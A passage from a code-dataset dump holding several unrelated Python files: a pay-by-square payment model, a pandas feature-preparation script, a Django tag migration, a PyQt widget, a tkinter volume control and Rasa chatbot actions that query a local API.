FEBRUARY = \"February\"\n    MARCH = \"March\"\n    APRIL = \"April\"\n    MAY = \"May\"\n    JUNE = \"June\"\n    JULY = \"July\"\n    AUGUST = \"August\"\n    SEPTEMBER = \"September\"\n    OCTOBER = \"October\"\n    NOVEMBER = \"November\"\n    DECEMBER = \"December\"\n\n\nclass PaymentOption(Enum):\n    PAYMENTORDER = \"paymentorder\"\n    STANDINGORDER = \"standingorder\"\n    DIRECTDEBIT = \"directdebit\"\n\n\nclass Periodicity(Enum):\n    DAILY = \"Daily\"\n    WEEKLY = \"Weekly\"\n    BIWEEKLY = \"Biweekly\"\n    MONTHLY = \"Monthly\"\n    BIMONTHLY = \"Bimonthly\"\n    QUARTERLY = \"Quarterly\"\n    ANNUALLY = \"Annually\"\n    SEMIANNUALLY = \"Semiannually\"\n\n\n@dataclass\nclass BankAccounts:\n    \"\"\"\n    :ivar bank_account: single bank account\n    
\"\"\"\n bank_account: List[BankAccount] = field(\n default_factory=list,\n metadata={\n \"name\": \"BankAccount\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"min_occurs\": 1,\n }\n )\n\n\n@dataclass\nclass DirectDebitExt:\n \"\"\"direct debit extension.\n\n Extends basic payment information with information required for\n identification and setup of direct debit\n\n :ivar direct_debit_scheme: direct debit scheme, can be \"SEPA\" or\n \"other\". Use \"SEPA\" if direct debit complies with SEPA direct\n debit scheme\n :ivar direct_debit_type: type of direct debit, can be \"one-off\" or\n \"recurrent\"\n :ivar variable_symbol: variable symbol\n :ivar specific_symbol: specific symbol\n :ivar originators_reference_information: reference information\n :ivar mandate_id: identification of the mandate between creditor and\n debtor\n :ivar creditor_id: identification of the creditor\n :ivar contract_id: identification of the contract between creditor\n and debtor\n :ivar max_amount: maximum amount that can be debited\n :ivar valid_till_date: direct debit valid till date\n \"\"\"\n direct_debit_scheme: Optional[DirectDebitScheme] = field(\n default=None,\n metadata={\n \"name\": \"DirectDebitScheme\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n }\n )\n direct_debit_type: Optional[DirectDebitType] = field(\n default=None,\n metadata={\n \"name\": \"DirectDebitType\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n }\n )\n variable_symbol: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"VariableSymbol\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"pattern\": r\"[0-9]{0,10}\",\n }\n )\n specific_symbol: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"SpecificSymbol\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"pattern\": r\"[0-9]{0,10}\",\n }\n )\n originators_reference_information: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"OriginatorsReferenceInformation\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n mandate_id: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"MandateID\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n creditor_id: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"CreditorID\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n contract_id: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"ContractID\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n max_amount: Optional[Decimal] = field(\n default=None,\n metadata={\n \"name\": \"MaxAmount\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n valid_till_date: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"ValidTillDate\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n\n\n@dataclass\nclass StandingOrderExt:\n \"\"\"standing order extension.\n\n Extends basic payment information with information required for\n standing order setup\n\n :ivar day: this is the payment day. 
Its meaning depends on the\n        periodicity, meaning either day of the month (number between 1\n        and 31) or day of the week (1=Monday, 2=Tuesday, …, 7=Sunday).\n    :ivar month: selection of months on which payment occurs. If used,\n        set periodicity to \"Annually\". If payment occurs every month or\n        every other month consider setting periodicity to \"Monthly\" or\n        \"Bimonthly\" instead.\n    :ivar periodicity: periodicity of the standing order\n    :ivar last_date: date of the last payment of the standing order\n    \"\"\"\n    day: Optional[int] = field(\n        default=None,\n        metadata={\n            \"name\": \"Day\",\n            \"type\": \"Element\",\n            \"namespace\": \"http://www.bysquare.com/bysquare\",\n        }\n    )\n    month: List[Month] = field(\n        default_factory=list,\n        metadata={\n            \"name\": \"Month\",\n            \"type\": \"Element\",\n            \"namespace\": \"http://www.bysquare.com/bysquare\",\n            \"tokens\": True,\n        }\n    )\n    periodicity: Optional[Periodicity] = field(\n        default=None,\n        metadata={\n            \"name\": \"Periodicity\",\n            \"type\": \"Element\",\n            \"namespace\": \"http://www.bysquare.com/bysquare\",\n            \"required\": True,\n        }\n    )\n    last_date: Optional[str] = field(\n        default=None,\n        metadata={\n            \"name\": \"LastDate\",\n            \"type\": \"Element\",\n            \"namespace\": \"http://www.bysquare.com/bysquare\",\n        }\n    )\n\n\n@dataclass\nclass Payment:\n    \"\"\"\n    :ivar payment_options: Define which payment options are available:\n        \"paymentorder\", \"standingorder\" - requires StandingOrderExt,\n        \"directdebit\" - requires DirectDebitExt.\n    :ivar amount: payment amount\n    :ivar currency_code: payment currency code, 3 letter ISO4217 code\n    :ivar payment_due_date: payment due date. Used also as first payment\n        date for standing order.\n    :ivar variable_symbol: variable symbol\n    :ivar constant_symbol: constant symbol\n    :ivar specific_symbol: specific symbol\n    :ivar originators_reference_information: reference information\n    :ivar payment_note: payment note\n    :ivar bank_accounts: list of bank accounts\n    :ivar standing_order_ext: standing order extension. Extends basic\n        payment information with information required for standing order\n        setup\n    :ivar direct_debit_ext: direct debit extension. 
Extends basic\n payment information with information required for identification\n and setup of direct debit\n :ivar beneficiary_name:\n :ivar beneficiary_address_line1:\n :ivar beneficiary_address_line2:\n \"\"\"\n payment_options: List[PaymentOption] = field(\n default_factory=list,\n metadata={\n \"name\": \"PaymentOptions\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n \"tokens\": True,\n }\n )\n amount: Optional[Decimal] = field(\n default=None,\n metadata={\n \"name\": \"Amount\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n currency_code: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"CurrencyCode\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n \"pattern\": r\"[A-Z]{3}\",\n }\n )\n payment_due_date: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"PaymentDueDate\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n variable_symbol: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"VariableSymbol\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"pattern\": r\"[0-9]{0,10}\",\n }\n )\n constant_symbol: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"ConstantSymbol\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"pattern\": r\"[0-9]{0,4}\",\n }\n )\n specific_symbol: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"SpecificSymbol\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"pattern\": r\"[0-9]{0,10}\",\n }\n )\n originators_reference_information: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"OriginatorsReferenceInformation\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n payment_note: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"PaymentNote\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n bank_accounts: Optional[BankAccounts] = field(\n default=None,\n metadata={\n \"name\": \"BankAccounts\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n }\n )\n standing_order_ext: Optional[StandingOrderExt] = field(\n default=None,\n metadata={\n \"name\": \"StandingOrderExt\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n direct_debit_ext: Optional[DirectDebitExt] = field(\n default=None,\n metadata={\n \"name\": \"DirectDebitExt\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n beneficiary_name: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"BeneficiaryName\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n beneficiary_address_line1: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"BeneficiaryAddressLine1\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n beneficiary_address_line2: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"BeneficiaryAddressLine2\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n\n\n@dataclass\nclass Payments:\n \"\"\"\n :ivar payment: Payment order definition.\n \"\"\"\n payment: List[Payment] = field(\n default_factory=list,\n 
metadata={\n            \"name\": \"Payment\",\n            \"type\": \"Element\",\n            \"namespace\": \"http://www.bysquare.com/bysquare\",\n            \"min_occurs\": 1,\n        }\n    )\n\n\n@dataclass\nclass PayBase(BySquareDocument):\n    \"\"\"\n    :ivar invoice_id: Invoice identification code. Only used when pay by\n        square is part of the invoice. Otherwise this field is empty.\n    :ivar payments: Lists one or more payments.\n    \"\"\"\n    invoice_id: Optional[str] = field(\n        default=None,\n        metadata={\n            \"name\": \"InvoiceID\",\n            \"type\": \"Element\",\n            \"namespace\": \"http://www.bysquare.com/bysquare\",\n        }\n    )\n    payments: Optional[Payments] = field(\n        default=None,\n        metadata={\n            \"name\": \"Payments\",\n            \"type\": \"Element\",\n            \"namespace\": \"http://www.bysquare.com/bysquare\",\n            \"required\": True,\n        }\n    )\n\n\n@dataclass\nclass Pay(PayBase):\n    class Meta:\n        namespace = \"http://www.bysquare.com/bysquare\"\n","sub_path":"paybysquare/model/bysquare_pay_1_1_0.py","file_name":"bysquare_pay_1_1_0.py","file_ext":"py","file_size_in_byte":13577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"11555217","text":"\n# Import dependencies\nimport pandas as pd\nfrom pandas import set_option\nimport numpy as np\nimport os\nimport csv\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n# from keras.utils import to_categorical\n\n# import preprocessing from sklearn\nfrom sklearn import preprocessing\n\n# DictVectorizer\nfrom sklearn.feature_extraction import DictVectorizer\n\n\n#############################################################################################################\n# Function to generate the X predictor array or dataframe from the raw data and the key feature columns required\n# Accepts five parameters: ohe, target, numSamples, region, totsqft_cd\n# ohe : One Hot Encoding required\n# target : BTU or DOLLAR. Based on the target being predicted the target columns will be dropped / retained\n#############################################################################################################\n\ndef generateX_samp(ohe = True, target = \"BTU\", numSamples = 20, region = 0, totsqft_cd = 0): \n\n    dataFilePath = \"dataforfinalproject\"\n    filename = \"RECS_COMBINED_DATA.csv\"\n    cols_file = \"Final_Columns_withCat.csv\"\n    \n    totsqt = {0 : \"(df_recs.TOTHSQFT != -1)\",\n              1 : \"(df_recs.TOTHSQFT < 900)\",\n              2 : \"((df_recs.TOTHSQFT >= 900) & (df_recs.TOTHSQFT < 1500))\",\n              3 : \"((df_recs.TOTHSQFT >= 1500) & (df_recs.TOTHSQFT < 2500))\",\n              4 : \"((df_recs.TOTHSQFT >= 2500) & (df_recs.TOTHSQFT < 3500))\",\n              5 : \"(df_recs.TOTHSQFT >= 3500)\"}\n    \n\n    # read the dataset with all years' combined data\n    df_recs = pd.read_csv(os.path.join(dataFilePath, filename), low_memory= False)\n\n    if(numSamples != 0 and numSamples != df_recs.shape[0]):\n        if(region != 0): \n            sample_df = df_recs[(df_recs.REGIONC == region) & (eval(totsqt[totsqft_cd]))].sample( n = numSamples)\n        else:\n            sample_df = df_recs[(eval(totsqt[totsqft_cd]))].sample( n = numSamples)\n        print(sample_df)\n    else:\n        sample_df = df_recs\n    \n    \n    # read the columns from Columns csv\n    df_cols = pd.read_csv(os.path.join(dataFilePath, cols_file))\n#     df_cols.columns\n\n    # Whittle down the dataset to contain only Features required for modeling - X \n    modelDF = sample_df[df_cols[df_cols.FEATURES_MODEL == \"Y\"].COLUMN_NAME]\n    modelDF.to_csv(os.path.join(\"dataforfinalproject/InputSamples.csv\"), index = True)\n    print(f\" X Features shape : {modelDF.shape}\")\n\n    \n    \n\n    \n    if(target == \"BTU\"):\n        # Drop Price / Cost related Columns as it is only Consumption we are interested in \n        cost_cols = df_cols[(df_cols['COLUMN_NAME'].str.find(\"DOL\") != -1) & (df_cols.FEATURES_MODEL == \"Y\")].COLUMN_NAME.tolist()\n        modelDF.drop(cost_cols, axis = 1, inplace = True)\n        # Drop All BTU related cols too\n        btu_cols = df_cols[(df_cols['COLUMN_NAME'].str.find(\"BTU\") != -1) & (df_cols.FEATURES_MODEL == \"Y\")].COLUMN_NAME.tolist()\n        modelDF.drop(btu_cols, axis = 1, inplace = True)\n        \n        # and drop TOTAL BTU from X set\n#         X = modelDF.drop(['TOTALBTU'], axis = 1)\n        y_label = sample_df['TOTALBTU']\n        print(f\"y label shape : {y_label.shape}\")\n    else:\n        # Drop Price / Cost related Columns as it is only Consumption we are interested in \n        cost_cols = df_cols[(df_cols['COLUMN_NAME'].str.find(\"DOL\") != -1) & (df_cols.FEATURES_MODEL == \"Y\")].COLUMN_NAME.tolist()\n        modelDF.drop(cost_cols, axis = 1, inplace = True)\n        \n        # Also drop the Total BTU cols \n        btu_cols = df_cols[(df_cols['COLUMN_NAME'].str.find(\"TOTALBTU\") != -1) & (df_cols.FEATURES_MODEL == \"Y\")].COLUMN_NAME.tolist()\n        modelDF.drop(btu_cols, axis = 1, inplace = True)\n\n        y_label = sample_df['TOTALDOLLAR']\n        print(f\"y label shape : {y_label.shape}\")\n        # and drop TOTAL BTU from X set\n#         X = modelDF.drop(['TOTALDOLLAR'], axis = 1)\n    \n    X = modelDF\n    print(f\"shape of X is {X.shape}\")\n\n    if(ohe):\n        ### Apply dict vectorizer \n        # convert the X array into a dict\n        X_dict = X.to_dict(orient = \"records\")\n        \n\n        # instantiate a Dictvectorizer object for X\n        dv_X = DictVectorizer(sparse=False) # sparse=False makes the output a dense array rather than a sparse matrix\n\n        # apply dv_X on X_dict\n        X_encoded = dv_X.fit_transform(X_dict)\n        \n        vocab = dv_X.get_feature_names()\n        # return X_encoded and its vocab\n        return (X_encoded, vocab, y_label)\n    else:\n        return (X, X.columns,y_label)\n\n\n# In[4]:\n\n\n# generateX()\n\n\n# In[
]:\n\n\n\n\n","sub_path":"generateXdataExt.py","file_name":"generateXdataExt.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"639000907","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import migrations\n\nfrom django.conf import settings\nfrom django.core import serializers\n\nfrom TWLight.resources.models import TextFieldTag, Partner\nfrom taggit.models import Tag, TaggedItem\nfrom taggit.managers import TaggableManager\n\n# Migrate the existing tag objects to the model that lives in resources.\ndef copy_tags(apps, schema_editor):\n for old_tag in Tag.objects.all():\n new_tag = TextFieldTag()\n new_tag.name = old_tag.name\n new_tag.slug = old_tag.slug\n new_tag.save()\n\n\n# Opportunistically apply data from old tag field to the new tag field.\ndef retag_partners(apps, schema_editor):\n # Wrapped in try because languages that have been added after this\n # migration will be a dependency of the Partner objects. This is a\n # One-shot data migration, so it's fine if we skip it forever once all\n # servers have run it at least once.\n try:\n for partner in Partner.objects.all():\n old_tags = partner.old_tags.all()\n for old_tag in old_tags:\n partner.tags.add(old_tag.name)\n partner.save()\n except:\n pass\n\n\n# Delete the old tag data\ndef delete_old_tags(apps, schema_editor):\n for old_tag in Tag.objects.all():\n old_tag.delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"taggit\", \"0002_auto_20150616_2121\"),\n (\"resources\", \"0044_auto_20180612_1453\"),\n ]\n\n operations = [\n migrations.AddField(\n model_name=\"partner\",\n name=\"old_tags\",\n field=TaggableManager(\n blank=True,\n help_text=\"A comma-separated list of tags.\",\n through=\"taggit.TaggedItem\",\n to=\"taggit.Tag\",\n verbose_name=\"Old Tags\",\n ),\n ),\n migrations.RunPython(copy_tags),\n migrations.RunPython(retag_partners),\n migrations.RunPython(delete_old_tags),\n ]\n","sub_path":"TWLight/resources/migrations/0045_migrate_tags.py","file_name":"0045_migrate_tags.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"45306225","text":"from qt_core import *\nfrom gui.gui_constants import *\n\n\nclass FormLineEdit(QLineEdit):\n def __init__(\n self,\n width: int=Dimension.LINE_EDIT_DEF_WIDTH,\n height: int=Dimension.LINE_EDIT_DEF_HEIGHT,\n bg_color: str = Color.LINE_EDIT_DEF_BG_COLOR,\n bg_hover: str = Color.LINE_EDIT_DEF_HOVER_COLOR,\n text_alignment: str = \"left\",\n visibility: bool=True\n ):\n super().__init__()\n\n self.width, self.height = width, height\n\n self.is_visible = visibility\n self.bg_color = bg_color\n self.bg_hover = bg_hover\n self.text_alignment = text_alignment\n self.setMinimumHeight(height)\n self.setMinimumWidth(width) \n self.setMaximumWidth(width)\n self.setVisible(self.is_visible)\n\n # Applying the additional methods\n self.set_style()\n self.set_alignment()\n\n\n def set_alignment(self):\n \"\"\"Sets the alignment according to the entered string for this parameter.\"\"\"\n POSSIBLE_ALIGNMENTS = {\n \"right\": Qt.AlignRight,\n \"center\": Qt.AlignCenter,\n \"left\": Qt.AlignLeft\n }\n self.setAlignment(POSSIBLE_ALIGNMENTS[self.text_alignment])\n\n \n def set_style(self):\n \"\"\"Sets a stylesheet\"\"\"\n stylesheet_str = f\"\"\"\n QLineEdit {{\n background-color: {self.bg_color};\n }}\n\n QLineEdit:hover {{\n background-color: {self.bg_hover};\n }}\n \"\"\"\n\n 
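# apply the assembled stylesheet to this widget\n        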
self.setStyleSheet(stylesheet_str)\n\n","sub_path":"gui/widgets/py_lineedit.py","file_name":"py_lineedit.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"150448309","text":"import pygame\nimport sys\nfrom module1 import *\nfrom but import *\nfrom main1 import * #main\nfrom tkinter import *\n# from sp3 import *\n\ndef sound_controll():\n    root = Tk()\n    root.title(\"MUSIC CONTROLL\")\n    root.geometry(\"120x220+500+300\") # width, height, x position, y position\n    root.resizable(False, False) # the x (width) and y (height) values cannot be changed\n    def v_up():\n        v = pygame.mixer.music.get_volume()\n        pygame.mixer.music.set_volume(v + 0.1)\n        print(\"volume up\")\n        time.sleep(0.2)\n\n    def v_down():\n        v = pygame.mixer.music.get_volume()\n        pygame.mixer.music.set_volume(v - 0.1)\n        print(\"volume down\")\n        time.sleep(0.2)\n\n    btn_up = Button(root, width = 11, height = 2, fg = \"black\", bg = \"gray\", text = \"Volume Up\", command = v_up)\n    btn_up.place(x = 19, y = 20)\n\n    btn_down = Button(root, width = 11, height = 2, fg = \"black\", bg = \"gray\", text = \"Volume Down\", command = v_down)\n    btn_down.place(x = 19, y = 70)\n\n    mute = IntVar() # the selection is stored here as an int\n    def apply_mute():\n        # runs on every radio-button click, instead of the old one-shot check before mainloop\n        if mute.get() == 1:\n            pygame.mixer.music.pause()\n        else:\n            pygame.mixer.music.unpause()\n        time.sleep(0.2)\n\n    mute_button = Radiobutton(root, fg = \"black\", bg = \"gray\", text=\"pause\", value=1, variable=mute, command=apply_mute) # a numeric value requires an IntVar variable\n    mute_button.place(x = 20, y = 130)\n    mute_button = Radiobutton(root, fg = \"black\", bg = \"gray\", text=\"unpause\", value=2, variable=mute, command=apply_mute) # a numeric value requires an IntVar variable\n    mute_button.place(x = 20, y = 170)\n\n    root.configure(bg='gray')\n    root.mainloop()","sub_path":"Older_Demo/Sound_controll.py","file_name":"Sound_controll.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"322790352","text":"# This file contains your custom actions which can be used to run\n# custom Python code.\n#\n# See this guide on how to implement these actions:\n# https://rasa.com/docs/rasa/custom-actions\n\n\n# This is a simple example for a custom action which utters \"Hello World!\"\n\nfrom typing import Any, Text, Dict, List\n\nfrom rasa_sdk import Action, Tracker\nfrom rasa_sdk.events import SlotSet\nfrom rasa_sdk.executor import CollectingDispatcher\nimport random\nimport requests\nimport json\n# bring in the text-analysis module & external-search module\n#from . import TextAnalyze\n#from .OuterSearch import outerSearch\n## summary\n#from . import StackData\n\nhead_url='http://localhost:55001/api/'\n#head_url='https://soselab.asuscomm.com:55002/api/'\n \nclass ask_return_and_reward(Action):\n    def name(self) -> Text:\n        return \"ask_return_and_reward\"\n    def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n        # award points to the replier\n#        if tracker.get_slot(\"discuss_tags\") != None:\n#            selected_tags_id = tracker.get_slot(\"discuss_tags\").split(':',1)[1]\n#            selected_tags_id = selected_tags_id.replace(\" \", \"\")\n#            selected_tags_array = selected_tags_id.split(',')\n#        else:\n#            selected_tags_array = []\n        # get the tags\n        replier_id_room_id = tracker.get_slot(\"replier_id\").split(',')\n        replier_id = replier_id_room_id[1]\n        room_id = replier_id_room_id[2]\n        print(\"replier_id: \"+replier_id)\n        print(\"room_id: \"+room_id)\n        # add the points!\n#        tags=[]\n#        for i in selected_tags_array:\n#            r = requests.get(url = head_url+'query_tag_name', params = {'tag_id':i})\n#            data = r.json()\n#            tag_name = data['tag_name']\n#            tags.append({'tag_id':i, 'tag_name':tag_name})\n#        requests.post(head_url+'update_user_score', json={'_id':replier_id, 'tag':tags, 'score':3})\n        \n        reply=\"請問你願意回報此問題嗎?(僅限提問者回覆)\"\n        dispatcher.utter_message(text=reply)\n        return []\n    \nclass error_message_search(Action):\n    def name(self) -> Text:\n        return \"error_message_search\"\n    def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n        function = tracker.get_slot(\"function\")\n        print(\"pl(programming language):\"+tracker.get_slot(\"pl\"))\n        os = tracker.get_slot(\"os\")[0:-13]\n        pl = tracker.get_slot(\"pl\")[0:-13]\n        print(\"pl(programming language):\"+pl)\n        error_message_search_time = int(tracker.get_slot(\"error_message_search_time\"))\n        # get the needed info and the user's last input\n        question_or_error_message = tracker.get_slot(\"error_message_question\")\n        question_or_error_message = question_or_error_message.split(',',1)[1]\n        qkey = question_or_error_message.split(' ')\n        qkey.append(os)\n        qkey.append(pl)\n        \n#        # external search results (URLs)\n#        resultpage = outerSearch(qkey, 10, error_message_search_time)\n#        \n#        stack_items = [StackData(url) for url in resultpage]\n#        result_title = []\n##        for i in resultpage:\n#        for items in stack_items:\n#            # the data returned by showData is the JSON sent to the front end\n#            display = items.showData()\n#            result_title.append(display['question']['title'])\n##            result_title.append(i)\n        \n        reply = \"謝謝您的等待,以下為搜尋結果的資料摘要:\"\n#        for i in range(0, len(resultpage)):\n#            reply += (\"<br>\" + str(i+1) + \".\"+ result_title[i] + \"\")\n        reply += \"<br>點選摘要連結可顯示內容。<br><br>是否要繼續搜尋?\"\n\n        #reply += \"點我查看所有答案排名\"\n        dispatcher.utter_message(text=reply)\n        return [SlotSet(\"error_message_search_time\", float(error_message_search_time+1))]\n    \n    \nclass popover_return_incognito(Action):\n    def name(self) -> Text:\n        return \"popover_return_incognito\"\n    def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n#        affirm = [\"好\", \"是\", \"匿名\", \"我要匿名\"]\n        deny = [\"不\", \"否\", \"no\", \"別\"]\n        incognito = tracker.get_slot(\"whether_incognito\").split(',',1)[1]\n        reply = \"popover,是\"\n        for i in deny:\n            if i in incognito:\n                reply = \"popover,否\"\n        dispatcher.utter_message(text=reply)\n        return []\n    \n    \nclass received_discuss_tags(Action):\n    def name(self) -> Text:\n        return \"received_discuss_tags\"\n    def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n        print(\"received_discuss_tags\")\n        selected_tags_id = tracker.get_slot(\"discuss_tags\").split(':',1)[1]\n        selected_tags_id = selected_tags_id.replace(\" \", \"\")  # reassign: str.replace does not mutate in place\n        selected_tags_array = selected_tags_id.split(',')\n        selected_tags_name=\"\"\n        for i in selected_tags_array:\n            r = requests.get(url = head_url+'query_tag_name', params = {'tag_id':i})\n            data = r.json()\n            tag_name = data['tag_name']\n            selected_tags_name += (tag_name+', ')\n        selected_tags_name=selected_tags_name[0:-2]\n        reply = \"接收到了 \"+selected_tags_name+\" 標籤。請說明你想討論的問題。\"\n        dispatcher.utter_message(text=reply)\n        return []\n    \n    \n# fill the whole utterance (problem description / error message) into the slot\nclass fill_slot(Action):\n    def name(self) -> Text:\n        return \"fill_slot\"\n\n    def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n        function = tracker.get_slot(\"function\")\n        os = tracker.get_slot(\"os\")\n        pl = tracker.get_slot(\"pl\")\n        \n        print(\"os: \", os)\n        print(\"pl: \", pl)\n        if os!=None and pl!=None:\n            if \"錯誤訊息\" in function:\n                reply = \"請貼上您的錯誤訊息\"\n            elif \"引導式\" in function:\n                reply = \"請描述您遇到的問題\"\n            else:\n                reply = \"你的function抓不到\"\n        else:\n            if \"共同討論\" in function:\n                reply = \"是否匿名?\"\n            else:\n                if pl == None:\n                    reply = \"請問您使用的是什麼程式語言?<br>若之後要修改,請輸入「我要更改程式語言」\"
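                # the programming language is known, so ask for the missing operating system instead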
                elif os == None:\n                    reply = \"請問您使用的是什麼作業系統?<br>若之後要修改,請輸入「我要更改作業系統」\"\n        \n        dispatcher.utter_message(text=reply)\n        return []\n\n# analyze, search, and record the user input and related keywords (first search)\nclass analyze_and_search(Action):\n    def name(self) -> Text:\n        return \"analyze_and_search\"\n    def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n        print('in analyze_and_search')\n        function = tracker.get_slot(\"function\")\n        print(\"pl(programming language):\"+tracker.get_slot(\"pl\"))\n        os = tracker.get_slot(\"os\")[0:-13]\n        pl = tracker.get_slot(\"pl\")[0:-13]\n        print(\"pl(programming language):\"+pl)\n        if \"錯誤訊息\" in function:\n            # get the needed info and the user's last input\n            question_or_error_message = tracker.latest_message.get('text')\n            question_or_error_message = question_or_error_message.split(',',1)[1]\n            qkey = question_or_error_message.split(' ')\n            qkey.append(os)\n            qkey.append(pl)\n            \n            # external search results (URLs)\n            resultpage = outerSearch(qkey, 10, 0)\n            \n            stack_items = [StackData(url) for url in resultpage]\n            result_title = []\n#            for i in resultpage:\n            for items in stack_items:\n                # the data returned by showData is the JSON sent to the front end\n                display = items.showData()\n                result_title.append(display['question']['title'])\n#            result_title.append(i)\n            \n            reply = \"謝謝您的等待,以下為搜尋結果的資料摘要:\"\n            for i in range(0, len(resultpage)):\n                reply += (\"<br>\" + str(i+1) + \".\"+ result_title[i] + \"\")\n            reply += \"<br>點選摘要連結可顯示內容。<br><br>希望有幫到你,歡迎下次光臨!\"\n\n            #reply += \"點我查看所有答案排名\"\n            dispatcher.utter_message(text=reply)\n            return []\n        elif \"引導式\" in function:\n            # get the needed info and the user's last input\n            question_or_error_message = tracker.latest_message.get('text')\n            question_or_error_message = question_or_error_message.split(',',1)[1]\n            print(question_or_error_message)\n            \n            # declare the text analyzer\n#            textAnalyzer = TextAnalyze.TextAnalyze()\n            # extract keywords from the user's question\n            qkey = ['flask']\n#            qkey = textAnalyzer.contentPreProcess(question_or_error_message)[0]\n            # add the OS and programming language as keywords\n            qkey.append(os)\n            qkey.append(pl)\n            print(\"qkey:\")\n            print(qkey)\n#            resultpage = outerSearch(qkey, 10, 0)\n            # internal search\n#            response = requests.post(head_url+'query_inner_search', json={'keywords':qkey})\n            # print(\"內部搜尋的結果: \", response.text)\n            \n            # 慈 START\n#            objectAllPost = json.loads(response.text)\n#            if objectAllPost[\"inner_search_result\"] != None:\n#                postNumber = 1\n#                reply = \"謝謝您的等待,以下為搜尋結果:<br>\"\n
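#                # fetch each matching post by id and append its numbered title (commented-out draft)\n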
\"\n# for i in range(0, len(objectAllPost[\"inner_search_result\"])):\n# postId = objectAllPost[\"inner_search_result\"][i]\n# singlePostResponse = requests.post(head_url+'query_inner_post', json={'_id':postId})\n# # 轉成object\n# objectSinglePost = json.loads(singlePostResponse.text)\n# # print(\"單篇文章結果: \", objectSinglePost)\n# reply += str(postNumber)\n# reply += '. '\n# reply += objectSinglePost[\"title\"]\n# reply += '
